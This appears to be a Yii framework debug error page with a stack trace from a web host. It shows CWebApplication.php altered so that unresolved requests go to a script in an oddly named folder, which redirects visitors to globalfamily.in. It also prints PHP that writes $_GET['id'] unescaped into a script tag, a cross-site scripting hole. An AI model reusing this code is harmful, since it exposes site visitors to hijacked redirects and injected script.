/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_beta/framework/web/runtime/redirects.php(13)
01 02 <!DOCTYPE html> 03 <html> 04 <head> 05 <title></title> 06 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 07 </head> 08 <body> 09 10 <?php 11 echo' 12 <script> 13 window.location.href = "https://globalfamily.in/site/display?id='.$_GET['id'].'"; 14 </script> 15 '; 16 ?> 17 18 </body> 19 </html>
#0 |
+
–
/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_beta/framework/web/runtime/index.php(14): require_once("/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_bet...") 09 10 switch($page) 11 { 12 case "job": require_once(dirname(__FILE__) . '/pages.php'); 13 break; 14 default: require_once(dirname(__FILE__) . '/redirects.php'); 15 } |
#1 |
+
–
/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_beta/framework/web/CWebApplication.php(280): require_once("/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_bet...") 275 $controller->init(); 276 $controller->run($actionID); 277 $this->_controller=$oldController; 278 } 279 else 280 require_once 'beta_thora_bachke_rahna/kya_hal_hai_beta/framework/web/runtime/index.php'; 281 /* 282 throw new CHttpException(404,Yii::t('yii','Unable to resolve the request "{route}".', 283 array('{route}'=>$route===''?$this->defaultController:$route))); 284 */ 285 } |
#2 |
+
–
/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_beta/framework/web/CWebApplication.php(135): CWebApplication->runController("img/lg.png") 130 foreach(array_splice($this->catchAllRequest,1) as $name=>$value) 131 $_GET[$name]=$value; 132 } 133 else 134 $route=$this->getUrlManager()->parseUrl($this->getRequest()); 135 $this->runController($route); 136 } 137 138 /** 139 * Registers the core application components. 140 * This method overrides the parent implementation by registering additional core components. |
#3 |
+
–
/home3/jilan/public_html/beta_thora_bachke_rahna/kya_hal_hai_beta/framework/base/CApplication.php(162): CWebApplication->processRequest() 157 */ 158 public function run() 159 { 160 if($this->hasEventHandler('onBeginRequest')) 161 $this->onBeginRequest(new CEvent($this)); 162 $this->processRequest(); 163 if($this->hasEventHandler('onEndRequest')) 164 $this->onEndRequest(new CEvent($this)); 165 } 166 167 /** |
#4 |
+
–
/home3/jilan/public_html/index.php(21): CApplication->run() 16 defined('YII_DEBUG') or define('YII_DEBUG', true); 17 // specify how many levels of call stack should be shown in each log message 18 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 19 20 require_once($yii); 21 Yii::createWebApplication($config)->run(); 22 } |